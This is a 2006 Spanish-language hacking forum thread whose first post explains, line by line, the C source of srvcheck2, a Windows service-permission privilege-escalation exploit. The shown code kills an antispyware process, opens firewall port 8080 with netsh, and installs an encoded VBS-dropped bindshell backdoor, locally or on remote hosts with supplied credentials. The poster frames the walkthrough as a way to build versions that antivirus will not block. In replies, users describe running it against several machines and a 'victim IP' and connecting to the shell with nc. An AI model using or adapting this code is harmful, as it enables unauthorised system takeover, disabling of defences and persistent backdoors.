elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Ingresar Registrarse
19 Marzo 2010, 17:04  


Temas destacados: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderadores: Anon, berz3k)
| | |-+  Sobre srvcheck/2, escalando privilegios en WINDOWS (Remoto Y Local)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Sobre srvcheck/2, escalando privilegios en WINDOWS (Remoto Y Local)  (Leído 4927 veces)
sirdarckcat
Absolutamente no es (por ningun motivo):
CoAdmin
*****
Desconectado Desconectado

Mensajes: 6.375


xDDD


Ver Perfil WWW
Sobre srvcheck/2, escalando privilegios en WINDOWS (Remoto Y Local)
« en: 14 Febrero 2006, 02:49 »

Sobre el srvcheck/2.exe

En fin, vamos a ver que onda..
"Microsoft Windows"
Este consta de una vulnerabilidad (si una, solo una), y la verdad no esta en programación..
Esta en que nuestros amigos los Administradores, y los que pusieron los permisos por defecto
alla en Microsoft, han cometido un grave error.
Nos han dado la capacidad de elevarnos privilegios :)

Normalmente, se deja el exploit, y todos preguntan, ¿porque no me compila?, no sale ningun servicio, que hago? etc.. asi que ahora me pongo a explicar el principio, y 2 funciones importantes..

Esto escencialmente es para evitar que luego, las compañias antivirus bloqueen el ejecutable, mejor asi ustedes crean su exploit segun les convenga :P.

Nos proveen con un codigo fuente del programa/exploit.. vamos a despedazarlo.. :P
Código:
/*
 * Privilege Scalation for Windows Networks using weak Service restrictions v2.0
 * (c) 2006 Andres Tarasco Acuña ( atarasco _at_ gmail.com )
 * Date: February 6, 2006 - http://www.haxorcitos.com
 * http://microsoft.com/technet/security/advisory/914457.mspx
 *
 * ---------------------------------------
 * LIST OF WELL KNOWN VULNERABLE SERVICES
 * ---------------------------------------
 *
 * * Windows XP with sp2
 *  - As Power User:
 *    service: DcomLaunch ( SYSTEM )
 *    Service: UpnpHost ( Local Service )
 *    Service: SSDPSRV (Local Service)
 *    Service: WMI (SYSTEM) <- sometimes as user also..
 *  - As User:
 *    Service: UpnpHost ( Local Service )
 *    Service: SSDPSRV (Local Service)
 *  - As Network Config Operators:
 *    service: DcomLaunch ( SYSTEM )
 *    Service: UpnpHost ( Local Service )
 *    Service: SSDPSRV (Local Service)
 *    Service: DHCP ( SYSTEM )
 *    Service: NetBT (SYSTEM - .sys driver)
 *    Service DnsCache (SYSTEM)
 *
 * * Windows 2000
 *  - As Power user
 *    service: WMI (SYSTEM)
 *
 *  * Third Part software (local & remote code execution)
 *    Service: [Pml Driver HPZ12] (HP Software - C:\WINNT\system32\spool\DRIVERS\W32X86\3\HPZipm12.exe)
 *    -Granted Full Control to Everyone Group.
 *
 *    Service: [Autodesk Licensing Service] (Autocad - C:\program files\Common files\Autodesk Shared\Service\AdskScSrv.exe)
 *    -Maybe related to: http://www.securityfocus.com/bid/16472 (Autodesk Multiple Products Remote Unauthorized Access Vulnerability)
 *
 *
 * IMPORTANT!! You should execute this tool without Admin privileges on the target system
 *  srvcheck.exe -? for information about usage.
 *
 * NOTE: This code compiles under Borland C++ Builder
 *
*/
Bueno, los creditos, explicación, etc..

Código:
#include <stdio.h>
#include <windows.h>
Aun no descubro para que sirven estas 2 lineas mmm.. xDDD

Código:
void doFormatMessage( unsigned int dwLastErr );
void usage(void);
DWORD StartModifiedService(SC_HANDLE SCM, char *srv, BOOL dbg);
void ListVulnerableService(char *host);
char *GetOwner(char *servicio);
Pre-declaramos algunas funciones, que se usan en un momento.

Código:
char init[]="cmd.exe /c rd /Q /S \\HXR";
Esto, es para borrar una carpeta, que se crea al crear el BackDoor

Código:
char antispyware[]="taskkill.exe  /IM gcasDtServ.exe";
Esto es para "matar" al proceso de AntiSpyware, y no ande moliendo a la hora de hacer el backdoor

Código:
char firewall[]="cmd.exe /c netsh firewall add portopening TCP 8080 SrvCheck ENABLE ALL";
Damos permiso al Firewall DE WINDOWS de abrir puerto 8080 :P, el ZoneAlarm, NIS, etc.. no (mmm.. sera?
alguien me dijo que incluso el ZA era vulnerable xDD)

Código:
char EncodedBackdoor[]=
"cmd.exe /c md \\HXR && " //Final Bindshell-code is an 804 bytes binary
//Encoded with Tarako Exe2vbs (http;//www,haxorc¡tos,com)
"echo f= \"4D5A000001z3z04z5z01z9z40z35z50z3z665AB44CCD21z10z504500004C01030048585221z8zE0000F010B010600A8z3zBCz7zC0010000C00100006802z4z400004z3z04z3z04z7z04z7z2403000028\">\\HXR\\a.vbs && "
"echo f=f ^& \"02z6z02z5z10000010z4z10000010z6z10z11z880200003Cz83z6802000020z27z2E576F70z4zA6z3zC0010000A8z3zC001z14z200000602E615434z4zB6z3z68020000B8z3z6802z14z400000402E54\">>\\HXR\\a.vbs && "
"echo f=f ^& \"524Bz4z04z3z2003000004z3z2003z14z400000C0558BEC81ECF4010000538D850CFEFFFF56506801010000FF157402400033F65656566A066A016A02FF15700240008BD88D45F06A10505366C745F002\">>\\HXR\\a.vbs && "
"echo f=f ^& \"0066C745F21F908975F4FF15780240006A0153FF157C0240008D45F0565053FF15800240008945EC8945E88945E48D459C508D45AC505656566A015656682003400056C745AC44z3z668975DCC745D801\">>\\HXR\\a.vbs && "
"echo f=f ^& \"0100008975B88975B48975E0FF15680240005E5BC9C210z3zFE02z6zE402000073000080020000800D00008001000080z4zCC02z10zF202000070020000C402z10z100300006802z22zFE02z6zE40200\">>\\HXR\\a.vbs && "
"echo f=f ^& \"0073000080020000800D00008001000080z4z3D00575341536F636B65744100005753325F33322E646C6C0000440043726561746550726F636573734100004B45524E454C33322E646C6Cz4z636D6400\">>\\HXR\\a.vbs && "
"echo i=1 : t = \"\" : While i^<=len(f) : If mid(f,i,1) = \"z\" then>>\\HXR\\a.vbs && "
"echo a=i+1 : k = 0 : while mid(f,a,1)^<^>\"z\" : k = k*10 + mid(f,a,1) : a = a+1 : WEnd : i = a+1 : for a=1 to k : t = t + \"00\" : Next>>\\HXR\\a.vbs && "
"echo ElseIf mid(f,i,1) ^<^> \"z\" then : t = t ^& mid(f,i,2) : i = i+2 >>\\HXR\\a.vbs && "
"echo end if : WEnd : Set o = CreateObject(\"Scripting.FileSystemObject\") >>\\HXR\\a.vbs && "
"echo Set n = o.CreateTextFile(\"\\HXR\\a.exe\", ForWriting) : i = 1 : while i ^< len(t)>>\\HXR\\a.vbs && "
"echo f = Int(\"&H\" ^& Mid(t, i, 2)) : n.Write(Chr(f)) : i = i+2 : WEnd : n.Close>>\\HXR\\a.vbs && "
"echo Set s=CreateObject(\"WScript.Shell\") : s.run(\"\\HXR\\a.exe\")>>\\HXR\\a.vbs &&"
"\\HXR\\a.vbs /B";
Este es el Mini-BindShell de Haxorsitos, mmm, adaptado a vbs, (Buen trabajo :)).

Código:
BYTE LIST=0,HELP=0,BACKDOOR=1, STOP=0;
char RemoteHost[256];
char permission[256];
Declarando variables..

Código:
int main(int argc, char* argv[]) {
ahm..

Código:
SC_HANDLE SCM,Svc;
 DWORD ret,len;
 char CurrentUserName[256];
 char *newPath=NULL;
 char *host=NULL;
 char *user=NULL;
 char *pass=NULL;
 char *srv=NULL;
 int i;
 NETRESOURCE NET;
  SERVICE_STATUS_PROCESS StopStatus;
mas variables, constantes, etc..

Código:
printf(" Services Permissions checker v2.0\n");
 printf(" (c) 2006 Andres Tarasco - atarasco%cgmail.com\n\n",'@');
Banner..

Código:
if (argc==1) usage();
 for (i=1;i<argc;i++) {
    if ( (strlen(argv[i])==2) && (argv[i][0]=='-') ) {
        switch (argv[i][1]) {
            case 'l': LIST=1; break;
            case 'm': srv=argv[i+1]; i=i+1;break;
            case 'u': if (!host) usage(); user=argv[i+1]; i=i++; break;
            case 'p': if (!host) usage(); pass=argv[i+1]; i=i++; break;
            case 'H': host=argv[i+1]; i=i++; break;
            case 'c': newPath=argv[i+1]; i=i+1; BACKDOOR=0; break;
            case 's': STOP=1; break;
            case '?': HELP=1; usage(); break;
            default: printf("Unknown Parameter: %s\n",argv[i]);usage(); break;
        }
    }
 }
  if ((!LIST) && (!srv) )usage();
Bueno.. esto manda a la debida funcion, cada cosa.. o si no a ayuda..

Código:
    if ( (ret!=NO_ERROR) && (user !=NULL) ) {
:o error :(
Código:
        if (ret==1219) { //connection already created. Disconnecting..
            printf("[-] Credentials mismatch. Removing old connection\n");
            WNetCancelConnection2(RemoteHost,NULL,TRUE);
            ret=WNetAddConnection2(&NET,pass,user,CONNECT_UPDATE_PROFILE);
si ya existe la conexión, reiniciamos..
Código:
        } else {
            if (ret==1326) { //usuario o contraseña incorrecta
             if (strchr(user,'\\')==NULL) {
                 sprintf(CurrentUserName,"localhost\\%s",user);
                printf("[-] Unknown Username or password\n");
                printf("[+] Trying \"%s\" as new username\n",CurrentUserName);
                ret=WNetAddConnection2(&NET,pass,CurrentUserName,CONNECT_UPDATE_PROFILE);
             }
            }
        }
Pass incorrecto..

Código:
        if (ret!=NO_ERROR) {
            printf("WNetAddConnection Failed to %s (%s/ %s)\n",RemoteHost,user,pass);
            doFormatMessage(GetLastError());
            exit(-1);
        }
}
    printf("[+] Network Connection OK\n");
Error extraño..

Código:
} else {
    printf("[+] Trying to enumerate local resources\n");
    len=sizeof(CurrentUserName)-1;
    GetUserName(  CurrentUserName,&len);
    printf("[+] Username: %s\n",CurrentUserName);
 }
Ready? GO!
no hubo error, ahora vamos con lo interesante..

Código:
if (LIST) {
    ListVulnerableService(host);
    exit(1);
}
Ok, ¿Colocamos los Servicios vulnerables?
vamos a ver esta funcion, en especifico :)
Código:
void ListVulnerableService(char *host) {
recibimos host.. que si es local debe ser igual a..?

Código:
SC_HANDLE SCM;
 SC_HANDLE Svc;
 DWORD nResumeHandle;
 DWORD dwServiceType;
 LPENUM_SERVICE_STATUS_PROCESS lpServices;
 DWORD nSize = 0;
 DWORD nServicesReturned;
 unsigned int n;
 unsigned int l=0;
 DWORD dwByteNeeded;
 LPQUERY_SERVICE_CONFIG lpConfig;
 char *p;
declarando variables.

Código:
    SCM = OpenSCManager(host,NULL,SC_MANAGER_ENUMERATE_SERVICE);
SCM=Service Control Manager :P (Las API's rules no?)

Código:
    if (!SCM){
        printf("[-] OpenScManager() FAILED\n");
        doFormatMessage(GetLastError());
        exit(-1);
    }
Si no funciono, pues no funciono..

Código:
    nResumeHandle = 0;
    dwServiceType = SERVICE_WIN32 | SERVICE_DRIVER;
    lpServices = (LPENUM_SERVICE_STATUS_PROCESS) LocalAlloc(LPTR, 65535);
Establecemos en dwServiceType los servicios y su driver.
en lpServices, el status de los serivicos

Código:
    if (!lpServices) {
        printf("[-] CRITICAL ERROR: LocalAlloc() Failed\n");
        exit(-1);
    }
Error  :-( :-(

Código:
    memset(lpServices,'\0',sizeof(lpServices));
Establecemos memoria..

Código:
    if (EnumServicesStatusEx(SCM, SC_ENUM_PROCESS_INFO,
        dwServiceType, SERVICE_STATE_ALL,
        (LPBYTE)lpServices, 65535,
        &nSize, &nServicesReturned,
        &nResumeHandle, NULL) == 0)
    {
        printf("EnumServicesStatusEx FAILED\n");
        exit(-1);
    }

    printf("[+] Listing Vulnerable Services...\n");
3,2,1..

Código:
    for (n = 0; n < nServicesReturned; n++) {
        Svc = OpenService(SCM,lpServices[n].lpServiceName, SERVICE_CHANGE_CONFIG | SC_MANAGER_ENUMERATE_SERVICE |GENERIC_READ);
        if (Svc!=NULL) {
            l++;
            printf("\n    [%s]\t\t%s\n",lpServices[n].lpServiceName, lpServices[n].lpDisplayName);
            printf("    Status: 0x%x\n",lpServices[n].ServiceStatusProcess.dwCurrentState);
            if (!host) {
                p=GetOwner(lpServices[n].lpServiceName);
                if (p) {
                    printf("    Context:\t\t%s\n",p);
                }
            }
    dwByteNeeded = 0;
    lpConfig = (LPQUERY_SERVICE_CONFIG) LocalAlloc(LPTR, 1024*8);
    if (QueryServiceConfig(Svc, lpConfig, 1024*8, &dwByteNeeded)!=0) {
                printf("    Parameter:\t\t%s\n",lpConfig->lpBinaryPathName);
            }else {
                doFormatMessage(GetLastError());
            }
        }
    }
El bendito for..
ahora vamos por partes..
¿como sabe donde hay servicios vulnerables?

Código:
    for (n = 0; n < nServicesReturned; n++) {
en nServicesReturned esta la cantidad de servicios que hay.. es decir vamos a analizar todos.

Código:
Svc = OpenService(SCM,lpServices[n].lpServiceName, SERVICE_CHANGE_CONFIG | SC_MANAGER_ENUMERATE_SERVICE |GENERIC_READ);
en la variable Svc cargamos la info del servicio, con ¿privilegios de cambiar su configuracion?

Código:
if (Svc!=NULL) {
si conseguimos sacar la info..

Código:
            l++;
            printf("\n    [%s]\t\t%s\n",lpServices[n].lpServiceName, lpServices[n].lpDisplayName);
            printf("    Status: 0x%x\n",lpServices[n].ServiceStatusProcess.dwCurrentState);
Bingo, servicio vulnerable.. despues checamos el contexto, si es remoto..

Código:
    lpConfig = (LPQUERY_SERVICE_CONFIG) LocalAlloc(LPTR, 1024*8);
    if (QueryServiceConfig(Svc, lpConfig, 1024*8, &dwByteNeeded)!=0) {
                printf("    Parameter:\t\t%s\n",lpConfig->lpBinaryPathName);
            }else {
                doFormatMessage(GetLastError());
            }
        }
    }
Conseguimos la configuración del servicio, en el parametro vulnerable, y lo mostramos :P.
LOOP con cada servicio.

Código:
    printf("\n[+] Analyzed %i Services in your system\n",nServicesReturned);
    if (l>0) {
        printf("[+] You were Lucky. %i vulnerable services found\n",l);
    }   else {
        printf("[+] Your system is secure! Great! :/\n");
    }
     if (host) WNetCancelConnection2(RemoteHost,NULL,TRUE);
    CloseServiceHandle(SCM);
    LocalFree(lpServices);
    exit(1);
}
Fin de la historia..
Yo recibi
  • Your system is secure! Great! :/
:( Falso, encontro 1 servicio vulnerable

Bien.. ahora seguimos con main()

Código:
SCM = OpenSCManager(host,NULL,STANDARD_RIGHTS_WRITE | SERVICE_START );
Ya quedamos que es esto

Código:
if (STOP) {
    Svc = OpenService(SCM,srv,SERVICE_CHANGE_CONFIG | STANDARD_RIGHTS_WRITE | SERVICE_STOP);
} else {
    Svc = OpenService(SCM,srv,SERVICE_CHANGE_CONFIG | STANDARD_RIGHTS_WRITE);
}
Abrimos el servicio.. en SERVICE_CHANGE_CONFIG   yeah!!

Código:
ControlService(Svc,SERVICE_CONTROL_STOP,&StopStatus)
Detenemos el servicio  :-X

Y creamos el backdoor!!

Código:
if (BACKDOOR) {
    printf("[+] Uninstalling previous backdoors\n");
    ret=ChangeServiceConfig(
        Svc,SERVICE_NO_CHANGE,SERVICE_AUTO_START,
        SERVICE_ERROR_IGNORE,init,NULL,NULL,"",
        NULL,NULL,NULL);

        if (ret!=0) StartModifiedService(SCM,srv,0);

    printf("[+] Granting Remote bindshell Execution..\n");
    ret=ChangeServiceConfig(
        Svc,SERVICE_NO_CHANGE,SERVICE_AUTO_START,
        SERVICE_ERROR_IGNORE,firewall,NULL,NULL,"",
        NULL,NULL,NULL);
        if (ret!=0) StartModifiedService(SCM,srv,0);
    printf("[+] Shutting down remote antispyware Service =)\n");
    ret=ChangeServiceConfig(
        Svc,SERVICE_NO_CHANGE,SERVICE_AUTO_START,
        SERVICE_ERROR_IGNORE,antispyware,NULL,NULL,"",
        NULL,NULL,NULL);
        if (ret!=0) StartModifiedService(SCM,srv,0);
    printf("[+] Installing Backdoor Code...\n");
    ret=ChangeServiceConfig(
        Svc,SERVICE_NO_CHANGE,SERVICE_AUTO_START,
        SERVICE_ERROR_IGNORE,EncodedBackdoor,NULL,NULL,"",
        NULL,NULL,NULL);
 } else { //Ejecutando parametros especificados con -c
    printf("[+] Sending custom commands to the service\n");
    ret=ChangeServiceConfig(
        Svc,SERVICE_NO_CHANGE,SERVICE_AUTO_START,
        SERVICE_ERROR_IGNORE,newPath,NULL,NULL,"",
        NULL,NULL,NULL);
 }

jaja, vamos mas lento no?
Código:
    printf("[+] Uninstalling previous backdoors\n");
    ret=ChangeServiceConfig(
        Svc,SERVICE_NO_CHANGE,SERVICE_AUTO_START,
        SERVICE_ERROR_IGNORE,init,NULL,NULL,"",
        NULL,NULL,NULL);
PreReset..

Código:
        if (ret!=0) StartModifiedService(SCM,srv,0);
Reiniciamos.. :P

Código:
    printf("[+] Granting Remote bindshell Execution..\n");
    ret=ChangeServiceConfig(
        Svc,SERVICE_NO_CHANGE,SERVICE_AUTO_START,
        SERVICE_ERROR_IGNORE,firewall,NULL,NULL,"",
        NULL,NULL,NULL);
        if (ret!=0) StartModifiedService(SCM,srv,0);
jojo, ojo!!
Firewall? OFF

Código:
    printf("[+] Shutting down remote antispyware Service =)\n");
    ret=ChangeServiceConfig(
        Svc,SERVICE_NO_CHANGE,SERVICE_AUTO_START,
        SERVICE_ERROR_IGNORE,antispyware,NULL,NULL,"",
        NULL,NULL,NULL);
        if (ret!=0) StartModifiedService(SCM,srv,0);
:P
SPYWARE!! OFF!!

Código:
    printf("[+] Installing Backdoor Code...\n");
    ret=ChangeServiceConfig(
        Svc,SERVICE_NO_CHANGE,SERVICE_AUTO_START,
        SERVICE_ERROR_IGNORE,EncodedBackdoor,NULL,NULL,"",
        NULL,NULL,NULL);
Encoded backdoor, lo definimos al principio, recuerdan?

Código:
}esle{
    printf("[+] Sending custom commands to the service\n");
    ret=ChangeServiceConfig(
        Svc,SERVICE_NO_CHANGE,SERVICE_AUTO_START,
        SERVICE_ERROR_IGNORE,newPath,NULL,NULL,"",
        NULL,NULL,NULL);
o si lo prefieres.. un simple "start cmd"

Código:
if (ret!=0) {
    printf("[+] The service have been succesfully modified =)\n");
    CloseServiceHandle(Svc);
    StartModifiedService(SCM,srv,1);
 } else {
    printf("[-] Service modification Failed\n");
    doFormatMessage(ret);
 }
verificamos que se haya creado todo bien..

Código:
CloseServiceHandle(SCM);
 if (host) WNetCancelConnection2(RemoteHost,NULL,TRUE);
 return(1);
cerramos y nos vamos

:P
hay mas funciones, pero estas son las importantes.. aunque vale la pena ver StartModifiedService


Les anexo el minishell de haxorsitos

Saludos!!
« Última modificación: 14 Febrero 2006, 02:59 por Sirdarckcat » En línea

Ertai
Ex-Staff

Desconectado Desconectado

Mensajes: 2.023


Ralph Wiggum


Ver Perfil
Re: Sobre srvcheck/2, escalando privilegios en WINDOWS (Remoto Y Local)
« Respuesta #1 en: 14 Febrero 2006, 02:58 »

 :o

Muy bueno Sirdarckcat!!
« Última modificación: 16 Febrero 2006, 14:45 por Ertai » En línea

Si la felicidad se comprara, entonces el dinero sería noble.

Código:
void rotar_by_ref(int& a, int& b) {
   /* Quien dijo que no se podia sin una variable temporal? */
   *a = *a ^ *b;
   *b = *a ^ *b;
   *a = *a ^ *b;
}
Man-In-the-Middle

Desconectado Desconectado

Mensajes: 3.537



Ver Perfil
Re: Sobre srvcheck/2, escalando privilegios en WINDOWS (Remoto Y Local)
« Respuesta #2 en: 14 Febrero 2006, 16:07 »

Ayer lo estaba probando, todas currando en win2000 sp4, de maravilla, pero hay un problema qu de 10 maquinas, 3 me han botado un error al momento de reiniciar, pero ojo a esas 3 pcs, le aplique la injeccion, al azar y al reinicar me botaban error de servicios

[wuauserv]
[WmdmPmSN]          Servicio del n·mero de serie de medio portßtil
Status: 0x1
Parameter:          C:\WINNT\System32\svchost.exe -k netsvcs

y las otras 7 a:


[WZCSVC]            Configuraci¾n inalßmbrica

y corrieron de maravilla  muaaaaack :-*

, el problema que cuando quiero ejecutar un exe, es que me la pone como en stand by, mientras que manda la orden



En línea
AngelFire

Desconectado Desconectado

Mensajes: 25


Ver Perfil
Re: Sobre srvcheck/2, escalando privilegios en WINDOWS (Remoto Y Local)
« Respuesta #3 en: 16 Febrero 2006, 14:03 »

Pues a mi no me funciona y me llama la atencion que cuando le pongo srvcheck2.exe -l -H ipvictima me dice que encontro 252
vulnerabilidades.Cuando los lanzo  srvcheck2.exe -H ip victima -m upnphost  a una maquina que tiene el mismo password que la mia todo va bien pero no obtengo la shell con nc  cuando me conecto al puerto 8080 y en la mayoria de los caso
me da error en el ultimo paso diciendo Error5 Access Denied.
Puedo hacer algo para aprovechar las 252 vulnerabilidades que dice que encontro.
En cyruxnet.org viene un ejemplo de como usarlo y realmente seria bueno que lo vieran para que me entendieran.

                                bye
AngelFire
En línea
Man-In-the-Middle

Desconectado Desconectado

Mensajes: 3.537



Ver Perfil
Re: Sobre srvcheck/2, escalando privilegios en WINDOWS (Remoto Y Local)
« Respuesta #4 en: 16 Febrero 2006, 15:08 »

Bueno te comento que ya se cual es tu error, y dos no necesitas password ni nada, solo fijate en donde escribes esta tu error , saludos
En línea
Páginas: [1] Ir Arriba Imprimir 
Ir a:  





Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

Yashira.org    Videojuegos    indetectables.net    Seguridad Informatica Colombia    Indejuegos    Internet móvil

Noticias Informatica    Seguridad Informática    ADSL    eNYe Sec    Seguridad Wireless    Underground México    Biblioteca de Seguridad

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.11 | SMF © 2006-2008, Simple Machines LLC